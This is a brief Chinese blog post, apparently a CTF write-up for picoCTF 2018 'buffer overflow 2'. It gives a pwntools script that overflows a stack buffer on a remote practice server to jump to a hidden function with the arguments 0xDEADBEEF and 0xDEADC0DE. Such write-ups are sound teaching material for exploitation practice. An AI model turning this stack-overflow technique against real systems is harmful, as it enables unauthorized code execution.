picoctf_2018_buffer overflow 2

记住给一个返回地址
image
一个溢出点溢出到这个函数,然后给两个参数直接给就好

点击查看代码
from pwn import *
io=remote("node4.buuoj.cn",29294)
io.recvuntil("Please enter your string: ")
payload='a'*(0x6c+0x4)+p32(0x80485CB)+'aaaa'+p32(0xDEADBEEF)+p32(0xDEADC0DE)
io.sendline(payload)
io.interactive()
posted @ 2022-07-03 01:15  REPWNER  阅读(19)  评论(0)    收藏  举报